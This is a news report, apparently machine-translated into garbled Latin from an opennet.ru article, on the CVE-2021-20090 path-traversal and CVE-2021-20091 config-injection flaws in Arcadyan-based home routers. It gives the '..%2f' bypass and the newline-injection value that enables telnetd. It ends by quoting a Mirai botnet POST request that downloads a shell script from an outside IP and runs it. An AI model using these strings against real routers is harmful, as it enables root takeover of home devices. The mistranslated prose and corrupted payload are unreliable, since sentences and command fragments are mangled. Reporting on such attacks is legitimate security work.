Vulnerabilitas in domo iter itineris afficiens 17 artifices

Impetus ingens in retiaculis contra iter domesticos conscriptum est cuius firmware exsecutionem servo HTTP ex societatis Arcadiae adhibet. Ad potestatem machinarum obtinendam, compositio duarum passitudinum adhibetur quae remotam exsecutionem codicis arbitrarii cum iuribus radicibus concedit. Problema satis amplis itineris ADSL ab Arcadyanis, ASUS et Buffalo afficit, nec non notae Beeline sub machinis instructae (quaestio confirmatur in Smert Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone et alia telecom operariorum. Notandum est quaestionem in firmware Arcadiae plus quam 10 annos interfuisse et hoc tempore migrare ad exempla saltem viginti machinarum ab 20 diversis artifices procuravit.

Prima vulnerabilitas, CVE-2021-20090, permittit ut cuilibet scripto instrumenti interreti sine authenticitate accedere possit. Essentia vulnerabilitas est quod in interface tela, quaedam directoria per quae imagines, fasciculi CSS et scripta JavaScript mittuntur, sine authenticitate pervia sunt. Hoc in casu, directoria pro quibus accessus sine authenticitate permittitur, larva initialis adhibita sunt. Characteres per semitas specificans "../" ire ad directorium parentis praeclusum est a firmware, sed usus "..%2f" coniunctio praetermittenda est. Ita paginas munitas aperire potest, cum petitiones mittens ut "http://192.168.1.1/images/..%2findex.htm".

Secunda vulnerabilitas, CVE-2021-20091, usorem authenticum efficit ut mutationes systematis occasus machinae mittant parametros speciales formatos ad scripturam applica- bilem, quae non retentat praesentiam novi ingenii in parametris. . Exempli gratia, cum pingis operando faciendo, oppugnator valorem "192.168.1.2%0AARC_SYS_TelnetdEnable=1" in campo cum inscriptione IP repressa, et scriptum, cum uncinis tabellam /tmp/etc/config/ creans .glbcfg, scribet lineam "AARC_SYS_TelnetdEnable=1" in eam, quae telnetd operatur, quae liberum mandatum praebet accessum testudinis cum iuribus radicibus. Similiter, modulo AARC_SYS statuendo, aliquem codicem in systemate exsequi potes. Prima vulnerabilitas efficit ut problematicum scriptum sine authenticatione currendum sit, eam accessu ut "/images/..%2fapply_abstract.cgi".

Ad vulnerabilitates uti, oppugnator petitionem mittere poterit ad portum retis in quo interfacies interfacies currit. Iudicantes dynamicas propagationis oppugnationis, multi operarii accessum relinquunt in cogitationibus suis ab retis exterioribus ad simpliciorem diagnosim problematum per servitium sustentationis. Si accessus ad interface solum ad retis internam limitatur, impetus fieri potest ab retis extraneis utens "DNS reclinare" technicam. Vulnerabilitates iam actuose ad iter botnet connectere Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: proxima User-Agent: Dark actio=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

Source: opennet.ru